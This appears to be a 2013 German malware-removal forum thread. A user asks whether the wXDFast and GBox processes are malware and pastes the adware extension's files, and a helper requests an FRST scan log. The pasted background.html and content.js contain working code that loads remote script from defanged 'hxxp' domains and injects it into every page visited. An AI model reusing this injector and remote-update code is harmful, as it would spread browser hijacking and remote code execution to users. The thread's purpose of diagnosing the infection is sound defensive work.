Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: WxDFast.exe und GBox.exe = Maleware?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 21.08.2013, 18:48   #1
mikeDE
 
WxDFast.exe und GBox.exe = Maleware? - Icon21

WxDFast.exe und GBox.exe = Maleware?



Hallo erstmal
Ich habe das Problem das eben meine CPU ziemlich hoch war. Dann wollte ich wissen welcher Prozess so hoch war und habe mal im Taskmanager nachgeschaut. Als der gestartet war habe ich dann gesehen das ich 2 Prozesse habe die mir komisch vorkommen und viel CPUS brauchen. Das waren WxdFast.exe (Benutzer SYSTEM) und GBox.exe(Benutzer: ich) Die beiden dateien befinden sich unter dem Pfad: C:\ProgramData . Die GBox.exe unter C:\ProgramData\GBox\Gbox.exe und die wXDFast.exe unter C:\ProgramData\wXDFast\wXDFast.exe . Beide dateien sind 206 KB gross. Beide dateienordner wodrin sich die Dateien befinden haben einen leeren "downloads" Ordner und eine settings.ini. Der Ordner wXDFast hat noch eine profil.ini und ein background.html und ein content.js (Javascript) Der Inhalt der background.html:
HTML-Code:
<!DOCTYPE html><html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/javascript">
var def_update_url='hxxp://getsyncer5.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getsync.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getproxy5.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getjpit.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://extsync.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getsyncer5.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://jpi-proxy.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getjpiproxy.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://jpi-syncer.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://jpigetjson.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://thebflix.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158';
var def_script='(function(){var str_http=window.self.location.href.indexOf("https://")>-1?"https://":"hxxp://";if(!document.getElementById("wxdbflix_sc")){var script=document.createElement("script");script.id="wxdbflix_sc";script.type="text/javascript";script.src=str_http+"def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE";document.getElementsByTagName("head")[0].appendChild(script)};})();';

mng = new function(){};
mng.run=function(){

	try{
		var jsonDB=window.exLocalStorage.getItem('jsondb.js');
		if(jsonDB){
			try{
				jsonDB=JSON.parse(jsonDB);
				var epoch = mng.getEpoch();
				
				if(parseInt(jsonDB.epoch) < epoch){
					updater.update(jsonDB.update_url);
				}
				else{
					var uto=(parseInt(jsonDB.epoch) - epoch);
					setTimeout(initialize,uto);
				}
			}
			catch(e){
				updater.update(def_update_url);
				try{tga.track('/IE/bugs/JsonUnValid/'+e);}catch(e){}
			}
		}
		else{
			updater.update(def_update_url);
			try{tga.track('/IE/NewUser');}catch(e){}
		}
	}
	catch(e){
		try{tga.track('/IE/bugs/runFailed/'+e);}catch(e){}
		mng.reload();
	}
}
mng.getEpoch = function(){
	var d=new Date();
	try{
		return ((d.getTime()-d.getMilliseconds())/1000);
	}
	catch(e){
		return parseInt(d.getTime()/1000);
	}
}
mng.reload=function(){
	self.location.reload();
}
mng.log=function(e){
	//console.log(e);
	return true;
}

updater = new function(){};
updater.successful=0;
updater.scripTag=0;
updater.update=function(sUrl){
	try{
		if(!sUrl){
			updater.save({
				epoch:1,
				update_url:def_update_url,
				scode:def_script
			});
			try{tga.track('/IE/NoDomains');}catch(e){}
		}
		else{
			if(updater.scripTag){return;}
			arrUrl=sUrl.split(';');
			updater.injectJson(arrUrl[0]);
			setTimeout(function(){
				updater.removeStag();
				if(!updater.successful){
				
					sUrl=sUrl.replace(arrUrl[0],'').replace(';','');
					updater.update(sUrl);
					try{tga.track('/IE/NoResponse/'+arrUrl[0]);}catch(e){}
					
				}
			},60000);
		}
	}
	catch(e){
		try{tga.track('/IE/bugs/updateFailed/'+e);}catch(e){}
		mng.reload();
	}
}

updater.injectJson=function(sUrl){
	try{
		updater.scripTag=document.createElement("script");
		updater.scripTag.type="text/javascript";
		updater.scripTag.src=sUrl+'&jsoncallback=getJson';
		updater.scripTag.id='jsonPscript';
		document.getElementsByTagName("head")[0].appendChild(updater.scripTag);
	}
	catch(e){
		try{tga.track('/IE/bugs/JsonPfailed/'+e);}catch(e){}
		mng.reload();
	}
}

updater.save=function(json){
	try{
		window.exLocalStorage.setItem('content.js',json.scode);
		window.exLocalStorage.setItem('jsondb.js', '{"epoch":'+(mng.getEpoch()+json.useconds)+',"update_url":"'+json.update_url+'"}');
		for(k in json){
			if(k!='scode' && k!='update_url' && k!='useconds'){
				window.exLocalStorage.setItem(k, json[k]);
			}
		}
		updater.successful=1;
		try{tga.track('/IE/ActiveUsers');}catch(e){}
	}
	catch(e){
		try{tga.track('/IE/bugs/CantSave/'+e);}catch(e){}
	}
}
updater.removeStag=function(){
	document.getElementsByTagName("head")[0].removeChild(updater.scripTag);
	updater.scripTag=0;
}




tga = new function(){};
tga.track=function(url){
	try{
	
		return true;
		
		url='/wxd'+url;
		var urchinCode='UA-29381986-1';
		var domain='justplug_analytics.it';

		  var i=1000000000,
			  utmn=tga.rand(i,9999999999),
			  cookie=tga.cookie,
			  random=tga.rand(i,2147483647),
			  today=(new Date()).getTime(),
			  img = new Image(),
			  urchinUrl = 'hxxp://www.google-analytics.com/__utm.gif?utmwv=1.3&utmn='
				  +utmn+'&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn='
				  +domain+'&utmr=ie&utmp='
				  +url+'&utmac='
				  +urchinCode+'&utmcc=__utma%3D'
				  +cookie+'.'+random+'.'+today+'.'+today+'.'
				  +today+'.2%3B%2B__utmb%3D'
				  +cookie+'%3B%2B__utmc%3D'
				  +cookie+'%3B%2B__utmz%3D'
				  +cookie+'.'+today
				  +'.2.2.utmccn%3D(referral)%7Cutmcsr%3Die_host%7Cutmcct%3Die_path%7Cutmcmd%3Dreferral%3B%2B__utmv%3D'
				  +cookie+'.-%3B';

		  img.src = urchinUrl;

	}catch(e){}
}
tga.rand=function(min,max){
	try{
		return min + Math.floor(Math.random() * (max - min));
	}
	catch(e){return 1;}
}
tga.cookie=tga.rand(10000000,99999999);
try{tga.track('/IE');}catch(e){}



function getJson(json){updater.save(json);};
function initialize(){mng.run();}
</script></head><body>&nbsp;</body></html>
Der Inhalt der Javascript Datei:
Code:
ATTFilter
(function(){var str_http=window.self.location.href.indexOf("https://")>-1?"https://":"hxxp://";if(!document.getElementById("wxdbflix_sc")){var script=document.createElement("script");script.id="wxdbflix_sc";script.type="text/javascript";script.src=str_http+"def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE";document.getElementsByTagName("head")[0].appendChild(script)};})();
         
. Inhalt der settings.ini:
Code:
ATTFilter
[IEPlugin]
modulename="bhoclass.dll"
clsid="{E73D4F0C-551D-C0E0-F981-BC40E0A3FAA8}"
progid="bhoclass.bho"
shortname="wxDfast"
version="1.0"
bgpage="background.html"
contentscript="content.js"

[Settings]
ChromeID	= "fgjmgaonhcgbelpohkmegjaneegiigil"
ChromeExt	= "fgjmgaonhcgbelpohkmegjaneegiigil.crx"
ChromeVer	= "1.0"
IEPlugin	= "bhoclass.dll"
FFID		= "5026268e6946d@5026268e694a6.info"
ProductName	= "wxDfast"
Publisher	= "wxDfast"
CategoryName = "Justplugit"
InstallDate = "20120805"
InfoURL		= "hxxp://wxdownloadmanager.com"
productID	= "{4F4C5E11-0612-48D2-8055-987992AAC432}"
RemoveURL	= "hxxp://uninstall.justplug.it/?ext=wxd"
         
der Inhalt der profile.ini :
Code:
ATTFilter
[mabVaygagnb8ayEaDabHaa]
kabGay1ahab8ayraDabpaywaBnbVaa=lEb5awnamYbZazraDaa
kabGay1ahab8ayraDabday1ahabVaa=lEb5awnamYbZazraDaa
kYbVaygaCYbVazraAabtay5aDabVazsaDYbZayEa=rna5adaaraaEaa
kab8aysaBabPazraAabVazsainbwaa=rnaHadra
nEbLazkaBYb9azsaWnbday1ahabVaa=mabxaa
kYbVayCaAnbHaznahnbGawnagnb9ayka=rYaEadwarYaLadaapaaLadwarna
inbKazraDabZayEaBabVazsainbwaa=qnaEadsaqYaGadYagYa4adgagEbZaysapaaGac5araaFadkaqEaEadsaraaEaa
kEbVazraCEbPay1aBYbtawna=WEbcawsaqnaEadYamYbyadCavna8adsapabbac9amnbdawnanEaJawnannaGadkavna8adganYa6awsamYa6awraqEbxadYannb0aa
kYbVazaaBEbGaznalnbGayEa=Aab9aznaCaa3ac1avEb6azCaDEaKaznaCYbZayraAEbKayEavYbPay5ahYbLac1aAnbKazraDabZayEaBabJaywaDabVac1aCabOazaavEbZayCahnbKaznafEb9azsagnbTaykavYbEayYaCaa/aysaDnbTayIahnb9ad9arYaEadwarYaEadCarnaFaa
lnbEaynagnb9aykaiabLazraDaaFaa=Aab9aznaCaa3ac1avEbEazsaBEb5azUaCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLaa
lnbEaynagnb9aykaiabLazraDaaGaa=Aab9aznaCaa3ac1avEbSazkaBabIaykaDabPay5aCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLaa
lnbEaynagnb9aykaiabLazraDaaHaa=Aab9aznaCaa3ac1avEbEazsahnbHazraCYbVayEahnbZazrahnbHazUaBYbTac5aAnbKaygaBEaLayCahnb9ac1a
lnbEaynagnb9aykaknb8aykaCYb4aa=CabGay1ahab8ayraDaa0ackakabGay1ahab8ayraDabpaywaBnbVackatYbEazkagYbPaynaonaVaxaaDnbSayEaAnbHayYahnbGawUamaaVacgahEbVay1aonaVawraBEb8ay5aDabGazUanEbLaynahnaVacgaCYbVayCaAnbHaznahnbGax1ahabZaznahna0ackakYbVayCaAnbHaznahnbGawnagnb9aykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVacgaDYbVazsaCEbPay1aBYa0adra
nnbTaznaAnb7aykakEbTayYahnbUazkaBabVazsa=lEb5awnamYbZazraDablazaahabZaznahnbGaxnagnbHayIaWEaHawrarnbcawwarnbwadYavnbxawwannbxac9aqaaGawsanYaJadUanYbdadUavna5adkannaGadCapnaEadYanYaHadnamYb0aa
kEbVazsaAnbZayEajYb8ay9agYbVazsa=qEaEaa
lnbEaynagnb9aykaiabLazraDabHaa=Aab9aznaCaa3ac1avEbSazkaBabIaykaDabPay5aCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLad1aCabGay1ahab8ayraDaa0ackakabGay1ahab8ayraDabpaywaBnbVackatYbEazkagYbPaynaonaVaxaaDnbSayEaAnbHayYahnbGawUamaaVacgahEbVay1aonaVawraBEb8ay5aDabGazUanEbLaynahnaVacgaCEbKad9atnbjaykaCYbPaywaBabpazkaBnbSaykaCYaVacgaAnbKazraDabPaynaonaVawUaBYbHaznagnbIayEahnbGawUamaaVacgaCEbPaynaonaVaxrahnbHazraAnbLay5ainbwackapEbOaznaDabEadOavEaLazaaCYbVazraCEbGaykaBabVaywaCEbVazraWnbKayravYbPay5ahYbLac1ahEbVaznavEa/azaaCYbLaynaDnbTaznaonaVaxaaCYbLaynaDnbTaznajYbZay9ahnaVacgaCab8aysaAnbUad9atnbnazkagYbIayUaCEbOaykaCYbtawnatnaMayCahnbLad9atnbday1aDnbKaznaCYb4awraBEbUaykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVadIaAab9aznaCaa3ac1avEb8azaahabZaznahnbTay1aAnbKayraAnbUaykavYbPay5ahYbLac1ahEbVaznavEa/azaaCYbLaynaDnbTaznaonaVaxaaCYbLaynaDnbTaznajYbZay9ahnaVacgaCab8aysaAnbUad9atnbnazkagYbIayUaCEbOaykaCYbtawnatnaMayCahnbLad9atnbday1aDnbKaznaCYb4awraBEbUaykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVadIaAab9aznaCaa3ac1avEb8azaahabZaznahnbHazUaBYbTac5aAnbKaygaBEaLayCahnb9ac1aoEbEazsaBEbUazkagEb9ad9atnbnazsaBEbUazkagEb9aw5agnbJaykatnaMazaaDnbSayUahaa0ackakab8aysaBabPazraAabVazsainbwackatYbNaykaBEa0ackanEbLazkaBYb9azsaWnbday1ahabVackatYbHay5aonaVaxrahnbGayUagnbIaw5aDnbJaysahnbGackatYbPay5aCEb9ayUahaa0ackainbKazraDabZayEaBabVazsainbwackatYbHayUahaa0ackakEbVazraCEbPay1aBYbtawnatna2aa
[jabLayCa]
jabZazraDablazaahabZaznahnbUaa=jnbLay5aDabZayCavaaYadsaraaKacaajnbZayUasaaGadaarnaHacaarna7adOarYa8adOarEaHaa
         
Dann befindet sich hoch eine endlos heisende .crx datei im Ordner
Ich habe die endlose crx datei (Chrome erweiterungs instalierer) die datei habe ich nurmal in Chrome > Erweiterungen gezogen aber nicht Instalieren gedrückt die Erweiterung heist wXDFast. habe dir GBox.exe mal unter hxxp://www.virustotal.com hochgeladen: Hier scan Ergebniss: https://www.virustotal.com/de/file/31486eb4bf87f2f2dc29d56fc4fc68b7c2790342abb85796b9f7bb113eacb43f/analysis/ Da steht das Der Orginal Name der Datei wXDFast.exe und das 3 Virenprogramme Alarm schlagen. Soweit ich das Verstehe ist das ein Trojan.Dropper Meine Frage jetzt: Ist das Maleware und wenn ja was soll ich machen

Geändert von mikeDE (21.08.2013 um 19:33 Uhr)

Alt 21.08.2013, 20:38   #2
schrauber
/// the machine
/// TB-Ausbilder
 

WxDFast.exe und GBox.exe = Maleware? - Standard

WxDFast.exe und GBox.exe = Maleware?



Hi,

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

__________________

__________________

Alt 22.08.2013, 10:40   #3
mikeDE
 
WxDFast.exe und GBox.exe = Maleware? - Standard

WxDFast.exe und GBox.exe = Maleware?



Ok habe ich es ist aber noch etwas passiert: Mein Bruder war an dem PC und Antivir hat irgendein Adware virus gefunden. Ich war leider nicht dar. Es war der Pfad zu den Beiden Ordner er hat blöderweise Jetzt die beiden Ordner gelöscht. Ich sollte mir echt ein Passwort reinmachen Ist jetzt alles wieder Normal? Hier trodzdem die LOG:
FRST.txt

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 21-08-2013 02
Ran by Niklas (administrator) on 22-08-2013 11:32:07
Running from C:\Users\Niklas\Desktop
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 10
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe
(Microsoft Corporation) C:\Windows\system32\WLANExt.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Microsoft Corporation) c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(Intel(R) Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation) c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\ccSvcHst.exe
(Protexis Inc.) c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\ccSvcHst.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesService64.exe
() C:\Program Files\Web Assistant\ExtensionUpdaterService.exe
() C:\Program Files\Web Assistant\ExtensionUpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesApp64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Wistron) C:\Program Files (x86)\Launch Manager\HotkeyApp.exe
(Wistron Corp.) C:\Program Files (x86)\Launch Manager\OSD.exe
(Wistron Corp.) C:\Program Files (x86)\Launch Manager\WButton.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Synaptics Incorporated) C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
(Wistron Corp.) C:\Program Files (x86)\Launch Manager\WisLMSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Mister Group) C:\Program Files (x86)\System Explorer\SystemExplorer.exe
(Mister Group) C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
(Microsoft Corporation) C:\Windows\system32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [IntelPROSet] - C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-09-16] (Intel(R) Corporation)
HKLM\...\Run: [IntelPAN] - C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-09-16] (Intel(R) Corporation)
HKLM\...\Run: [BTMTrayAgent] - C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [10372368 2011-03-30] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12681320 2011-08-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] - C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277480 2011-08-16] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] - C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3023600 2013-02-25] (Synaptics Incorporated)
HKCU\...\Run: [Skype] - C:\Program Files (x86)\Skype\Phone\Skype.exe [19875432 2013-06-21] (Skype Technologies S.A.)
HKCU\...\Run: [Spybot-S&D Cleaning] - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [3642312 2013-05-16] (Safer-Networking Ltd.)
HKCU\...\Policies\system: [LogonHoursAction] 2
HKCU\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
MountPoints2: {3ba2dfcb-42b1-11e1-9817-806e6f6e6963} - E:\cdstart.exe
HKLM-x32\...\Run: [IAStorIcon] - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284440 2011-05-20] (Intel Corporation)
HKLM-x32\...\Run: [HotkeyApp] - C:\Program Files (x86)\Launch Manager\HotkeyApp.exe [207400 2011-08-06] (Wistron)
HKLM-x32\...\Run: [LMgrVolOSD] - C:\Program Files (x86)\Launch Manager\OSD.exe [348960 2011-08-06] (Wistron Corp.)
HKLM-x32\...\Run: [Wbutton] - C:\Program Files (x86)\Launch Manager\Wbutton.exe [447016 2011-08-13] (Wistron Corp.)
HKLM-x32\...\Run: [BlueStacks Agent] - C:\Program Files (x86)\BlueStacks\HD-Agent.exe [601928 2013-07-17] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [2255184 2013-06-28] (LogMeIn Inc.)
HKLM-x32\...\Run: [avgnt] - C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [345144 2013-08-18] (Avira Operations GmbH & Co. KG)
AppInit_DLLs: C:\PROGRA~3\Wincert\WIN64C~1.DLL C:\PROGRA~2\SEARCH~1\Datamngr\x64\datamngr.dll C:\PROGRA~2\SEARCH~1\Datamngr\x64\IEBHO.dll C:\Windows\system32\nvinitx.dll [1531256 2013-02-14] (Bandoo Media, inc)
AppInit_DLLs-x32: c:\progra~3\wincert\win32c~1.dll c:\windows\syswow64\nvinit.dll [7168 2013-02-07] ()
IMEO: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\groove.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hamachi-2-ui.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hd-apkhandler.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hd-runapp.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hd-startlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\infopath.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\launcher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\misc.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\msaccess.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\msoxmled.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\mspub.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\mstore.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\ois.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\onenote.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\openvpntray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\outlook.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\uninstall.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\watchmi tray.lnk
ShortcutTarget: watchmi tray.lnk -> C:\Windows\Installer\{F0559C5E-7912-4391-B1A0-6B975F0E5064}\SHCT_TRAY_STARTUP_F1540F35F9254DF584F2487D88448402.exe (Acresso Software Inc.)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

ProxyServer: 111.64.89.97:8080
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.aldi.com
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.bing.com
SearchScopes: HKLM - DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
